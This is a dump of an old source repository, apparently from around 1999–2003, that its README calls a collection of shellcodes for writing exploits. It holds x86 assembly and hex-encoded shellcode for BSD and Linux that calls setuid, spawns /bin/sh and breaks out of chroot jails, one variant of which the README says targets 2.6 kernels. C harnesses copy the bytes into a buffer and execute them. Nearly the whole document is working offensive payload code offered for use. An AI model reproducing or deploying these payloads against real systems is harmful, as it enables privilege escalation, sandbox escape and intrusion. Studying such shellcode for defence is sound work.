├── README ├── bsd ├── asm │ ├── execve.s │ └── setuid.s └── shellcode │ ├── Makefile │ ├── shellcode.c │ └── shellcode.h ├── linux ├── asm │ ├── chroot.s │ ├── execve.s │ ├── neo_chroot.s │ └── setuid.s └── shellcode │ ├── Makefile │ ├── shellcode.c │ └── shellcode.h └── shell.s /README: -------------------------------------------------------------------------------- 1 | A collection of shellcodes for writing exploits. 2 | Assembly code intel syntax. Use nasm assemble them. 3 | 4 | This might be old, but I spent a long time optimizing this code for size. 5 | 6 | BSD: 7 | - execve: call execve system call to execute any command 8 | - setuid: call setuid system call to set the user id 9 | 10 | Linux: 11 | - execve 12 | - setuid 13 | - chroot: bust out of chroot jails. this only worked on older kernels 14 | - new_chroot: this used a novel technique to break out of chroot jails on 2.6.0 kernels 15 | 16 | - Marshall Beddoe (unmarshal@gmail.com) 17 | Written around 1999 to 2003.. 18 | -------------------------------------------------------------------------------- /bsd/asm/execve.s: -------------------------------------------------------------------------------- 1 | .globl _main 2 | 3 | _main: 4 | xorl %eax,%eax 5 | pushl %eax 6 | pushl $0x68732f2f 7 | pushl $0x6e69622f 8 | movl %esp,%ebx 9 | pushl %eax 10 | pushl %esp 11 | pushl %ebx 12 | pushl %eax 13 | movb $0x3b,%al 14 | int $0x80 15 | 16 | call _exit 17 | -------------------------------------------------------------------------------- /bsd/asm/setuid.s: -------------------------------------------------------------------------------- 1 | .globl _main 2 | 3 | _main: 4 | xorl %eax, %eax 5 | pushl %eax 6 | pushl %eax 7 | movl $23, %al 8 | int $0x80 9 | -------------------------------------------------------------------------------- /bsd/shellcode/Makefile: -------------------------------------------------------------------------------- 1 | CC=gcc 2 | 3 | shellcode: 4 | $(CC) -o shellcode shellcode.c 5 | 6 | clean: 7 | rm -f shellcode core 8 | 9 | -------------------------------------------------------------------------------- /bsd/shellcode/shellcode.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include "shellcode.h" 3 | 4 | int main(void) 5 | { 6 | char buf[1024]; 7 | 8 | void (*func)(void) = (void(*))(buf); 9 | 10 | memset(buf, 0, sizeof(buf)); 11 | 12 | strcpy(buf, setuid); 13 | strcat(buf, execve); 14 | 15 | func(); 16 | } 17 | 18 | -------------------------------------------------------------------------------- /bsd/shellcode/shellcode.h: -------------------------------------------------------------------------------- 1 | /* 2 | * bsd shellcode collection 3 | * written by bind@insidiae.org 4 | */ 5 | 6 | char setuid[] = 7 | "\x31\xc0" /* xorl %eax, %eax */ 8 | "\x50" /* pushl %eax */ 9 | "\x50" /* pushl %eax */ 10 | "\xb0\x17" /* movl $23, %al */ 11 | "\xcd\x80"; /* int $0x80 */ 12 | 13 | char execve[] = 14 | "\x31\xc0" /* xorl %eax,%eax */ 15 | "\x50" /* pushl %eax */ 16 | "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */ 17 | "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */ 18 | "\x89\xe3" /* movl %esp,%ebx */ 19 | "\x50" /* pushl %eax */ 20 | "\x54" /* pushl %esp */ 21 | "\x53" /* pushl %ebx */ 22 | "\x50" /* pushl %eax */ 23 | "\xb0\x3b" /* movb $0x3b,%al */ 24 | "\xcd\x80"; /* int $0x80 */ 25 | -------------------------------------------------------------------------------- /linux/asm/chroot.s: -------------------------------------------------------------------------------- 1 | .globl main 2 | 3 | main: 4 | xorl %edx, %edx 5 | 6 | /* 7 | * mkdir("A"); 8 | */ 9 | 10 | pushl %edx 11 | push $0x41 12 | 13 | movl %esp, %ebx 14 | movw $0x01ed, %cx 15 | 16 | leal 0x27(%edx), %eax 17 | int $0x80 18 | 19 | /* 20 | * chdir("A"); 21 | */ 22 | 23 | leal 0x3d(%edx), %eax 24 | int $0x80 25 | 26 | /* 27 | * chroot("..//..//..//..//..//..//..//..//..//..//..//..//..//"); 28 | */ 29 | 30 | xorl %esi, %esi 31 | pushl %edx 32 | 33 | loop: 34 | pushl $0x2f2f2e2e 35 | 36 | incl %esi 37 | 38 | cmpl $0x10, %esi 39 | jl loop 40 | 41 | movl %esp, %ebx 42 | 43 | 44 | leal 0x3d(%edx), %eax 45 | int $0x80 46 | -------------------------------------------------------------------------------- /linux/asm/execve.s: -------------------------------------------------------------------------------- 1 | .globl main 2 | 3 | main: 4 | xorl %edx, %edx 5 | 6 | pushl %edx 7 | pushl $0x68732f2f 8 | pushl $0x6e69622f 9 | 10 | movl %esp, %ebx 11 | 12 | pushl %edx 13 | pushl %ebx 14 | 15 | movl %esp, %ecx 16 | 17 | leal 11(%edx), %eax 18 | int $0x80 19 | -------------------------------------------------------------------------------- /linux/asm/neo_chroot.s: -------------------------------------------------------------------------------- 1 | .globl main 2 | 3 | main: 4 | xorl %edx, %edx 5 | 6 | pushl %edx 7 | pushl $0x2e2e2e2e 8 | 9 | movl %esp, %ebx 10 | movw $0x01ed, %cx 11 | 12 | leal 0x27(%edx), %eax 13 | int $0x80 14 | 15 | leal 61(%edx), %eax 16 | int $0x80 17 | 18 | xorl %esi, %esi 19 | 20 | loop: 21 | pushl %edx 22 | pushw $0x2e2e 23 | movl %esp, %ebx 24 | 25 | leal 12(%edx), %eax 26 | int $0x80 27 | 28 | pushl %edx 29 | push $0x2e 30 | movl %esp, %ebx 31 | 32 | subl $88, %esp 33 | movl %esp, %ecx 34 | 35 | leal 106(%edx), %eax 36 | int $0x80 37 | 38 | movl 0x4(%ecx), %edi 39 | cmpl $0x2, %edi 40 | je hacked 41 | 42 | incl %esi 43 | cmpl $0x64, %esi 44 | jl loop 45 | 46 | hacked: 47 | pushl %edx 48 | push $0x2e 49 | movl %esp, %ebx 50 | 51 | leal 61(%edx), %eax 52 | int $0x80 53 | -------------------------------------------------------------------------------- /linux/asm/setuid.s: -------------------------------------------------------------------------------- 1 | .globl main 2 | 3 | main: 4 | xorl %ebx, %ebx 5 | leal 0x17(%ebx), %eax 6 | int $0x80 7 | 8 | -------------------------------------------------------------------------------- /linux/shellcode/Makefile: -------------------------------------------------------------------------------- 1 | CC=gcc 2 | 3 | shellcode: 4 | $(CC) -o shellcode shellcode.c 5 | 6 | clean: 7 | rm -f shellcode core 8 | 9 | -------------------------------------------------------------------------------- /linux/shellcode/shellcode.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include "shellcode.h" 3 | 4 | int main(void) 5 | { 6 | char buf[1024]; 7 | 8 | void (*func)(void) = (void(*))(buf); 9 | 10 | memset(buf, 0, sizeof(buf)); 11 | 12 | strcpy(buf, setuid); 13 | strcat(buf, chroot); 14 | strcat(buf, execve); 15 | 16 | func(); 17 | } 18 | 19 | -------------------------------------------------------------------------------- /linux/shellcode/shellcode.h: -------------------------------------------------------------------------------- 1 | /* 2 | * linux shellcode collection 3 | * written by bind@insidiae.org 4 | */ 5 | 6 | const char setuid[] = 7 | "\x31\xdb" /* xorl %ebx, %ebx */ 8 | "\x8d\x43\x17" /* leal 0x17(%ebx), %eax */ 9 | "\xcd\x80"; /* int $0x80 */ 10 | 11 | const char chroot[] = 12 | "\x31\xd2" /* xorl %edx, %edx */ 13 | "\x52" /* pushl %edx */ 14 | "\x6a\x41" /* push $0x41 */ 15 | "\x89\xe3" /* movl %esp, %ebx */ 16 | "\x66\xb9\xed\x01" /* movw $0x1ed, %cx */ 17 | "\x8d\x42\x27" /* leal 0x27(%edx), %eax */ 18 | "\xcd\x80" /* int $0x80 */ 19 | "\x8d\x42\x3d" /* leal 0x3d(%edx), %eax */ 20 | "\xcd\x80" /* int $0x80 */ 21 | "\x31\xf6" /* xorl %esi, %esi */ 22 | "\x52" /* pushl %edx */ 23 | "\x68\x2e\x2e\x2f\x2f"/* pushl $0x2f2f2e2e */ 24 | "\x46" /* incl %esi */ 25 | "\x83\xfe\x10" /* cmpl $0x10, %esi */ 26 | "\x7c\xf5" /* jl */ 27 | "\x89\xe3" /* movl %esp, %ebx */ 28 | "\x8d\x42\x3d" /* leal 0x3d(%edx), %eax */ 29 | "\xcd\x80" /* int $0x80 */ 30 | "\x52" /* pushl %edx */ 31 | "\x6a\x41" /* push $0x41 */ 32 | "\x89\xe3" /* movl %esp, %ebx */ 33 | "\x8d\x42\x28" /* leal 0x28(%edx), %eax */ 34 | "\xcd\x80"; /* int $0x80 */ 35 | 36 | const char neo_chroot[] = 37 | "\x31\xd2" /* xorl %edx, %edx */ 38 | "\x52" /* pushl %edx */ 39 | "\x68\x2e\x2e\x2e\x2e"/* pushl $0x2e2e2e2e */ 40 | "\x89\xe3" /* movl %esp, %ebx */ 41 | "\x66\xb9\xed\x01" /* movw $0x1ed, %cx */ 42 | "\x8d\x42\x27" /* leal 0x27(%edx), %eax */ 43 | "\xcd\x80" /* int $0x80 */ 44 | "\x8d\x42\x3d" /* leal 0x3d(%edx), %eax */ 45 | "\xcd\x80" /* int $0x80 */ 46 | "\x31\xf6" /* xorl %esi, %esi */ 47 | "\x52" /* pushl %edx */ 48 | "\x66\x68\x2e\x2e" /* pushw $0x2e2e */ 49 | "\x89\xe3" /* movl %esp, %ebx */ 50 | "\x8d\x42\x0c" /* leal 0xc(%edx), %eax */ 51 | "\xcd\x80" /* int $0x80 */ 52 | "\x52" /* pushl %edx */ 53 | "\x6a\x2e" /* push $0x2e */ 54 | "\x89\xe3" /* movl %esp, %ebx */ 55 | "\x83\xec\x58" /* subl $0x58, %ecx */ 56 | "\x89\xe1" /* movl %esp, %ecx */ 57 | "\x8d\x42\x6a" /* leal 0x6a(%edx), %eax */ 58 | "\xcd\x80" /* int $0x80 */ 59 | "\x8b\x79\x04" /* movl 0x4(%ecx), %edi */ 60 | "\x83\xff\x02" /* cmpl $0x2, %edi */ 61 | "\x74\x06" /* je */ 62 | "\x46" /* incl %esi */ 63 | "\x83\xfe\x64" /* cmpl $0x64, %esi */ 64 | "\x7c\xd7" /* jl */ 65 | "\x52" /* pushl %edx */ 66 | "\x6a\x2e" /* push $0x2e */ 67 | "\x89\xe3" /* movl %esp, %ebx */ 68 | "\x8d\x42\x3d" /* leal 0x3d(%edx), %eax */ 69 | "\xcd\x80"; /* int $0x80 */ 70 | 71 | const char execve[] = 72 | "\x31\xd2" /* xorl %edx, %edx */ 73 | "\x52" /* pushl %edx */ 74 | "\x68\x2f\x2f\x73\x68"/* pushl $0x68732f2f */ 75 | "\x68\x2f\x62\x69\x6e"/* pushl $0x6e69622f */ 76 | "\x89\xe3" /* movl %esp, %ebx */ 77 | "\x52" /* pushl %edx */ 78 | "\x53" /* pushl %ebx */ 79 | "\x89\xe1" /* movl %esp, %ecx */ 80 | "\x8d\x42\x0b" /* leal 0xb(%edx), %eax */ 81 | "\xcd\x80"; /* int $0x80 */ 82 | -------------------------------------------------------------------------------- /shell.s: -------------------------------------------------------------------------------- 1 | global _start 2 | 3 | _start: 4 | ; fall through.. 5 | 6 | _setuid: 7 | xor dword eax, eax 8 | push dword eax 9 | push dword eax 10 | mov al, 23 11 | int 0x80 12 | 13 | _shell: 14 | xor dword eax, eax 15 | push dword eax 16 | push dword 0x68732f2f 17 | push dword 0x6e69622f 18 | mov ebx, esp 19 | push dword eax 20 | push dword esp 21 | push dword ebx 22 | push dword eax 23 | mov al, 0x3b 24 | int 0x80 25 | 26 | _exit: 27 | xor dword eax, eax 28 | push dword eax 29 | mov al, 0x01 30 | int 0x80 31 | --------------------------------------------------------------------------------